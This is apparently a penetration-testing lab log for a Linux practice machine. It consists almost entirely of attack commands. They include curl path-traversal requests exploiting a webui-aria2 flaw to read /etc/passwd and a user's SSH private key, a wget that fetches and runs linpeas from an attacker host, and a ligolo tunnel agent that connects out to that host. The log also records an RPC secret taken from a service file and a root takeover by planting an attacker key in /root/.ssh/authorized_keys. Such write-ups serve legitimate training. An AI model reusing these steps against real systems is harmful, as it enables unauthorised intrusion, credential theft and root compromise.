🧪 Pentest Log: {{date:2025-07-22}}

🔍 Target Information

• Machine Name: Air
• IP Address: 192.168.157.100
• Operating System: Linux

📡 Enumeration

🔌 Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 192.168.157.100 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) 

nmap -p$ports -sC -sV 192.168.157.100 -oN tcp_scan_result.txt

nmap -sU --top-ports 100 192.168.157.100 -oN udp_scan_result.txt

Port 22

ssh -i id_rsa deathflash@192.168.157.100

Port 8888

Web Content Enumeration

search for webui-aria2 exploit, found CVE-2023-39141 (LFI)

curl --path-as-is http://192.168.157.100:8888/../../../../../../../../../../../../../../../../../../../../etc/passwd

curl --path-as-is http://192.168.157.100:8888/../../../../../../../../../../../../../../../../../../../../home/deathflash/.ssh/authorized_keys

curl --path-as-is http://192.168.157.100:8888/../../../../../../../../../../../../../../../../../../../../home/deathflash/.ssh/id_rsa

🧬 Privilege Escalation

👤 Current Access

• User: deathflash
• Groups: deathflash
• Shell Type: (reverse shell / web shell / meterpreter / etc.) ssh

🔍 Enumeration

Processes / Services:

ps aux

root is running aria2, but the rpc-secret value is masked, so we search for files with name containing aria2 for potential configuration file

find / -iname aria2* -type f 2>/dev/null

cat /etc/systemd/system/aria2.service

rpc-secret:mEHNghqcNiF3KV

Linpeas:

wget http://192.168.45.163/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

Internal Ports

port 6800

sudo ip tuntap add user kali mode tun ligolo

sudo ip link set ligolo up

./agent -connect 192.168.45.163:11601 -ignore-cert

sudo ip route add 240.0.0.1/32 dev ligolo

start

Visit 240.0.0.1:8888, update the secret section in the connection setting

ssh-keygen -t rsa -b 4096 -f id_rsa

cat id_rsa.pub >> authorized_keys

chmod 600 authorized_keys

download the authorized_keys file into the /root/.ssh folder, then ssh into the target machine using the id_rsa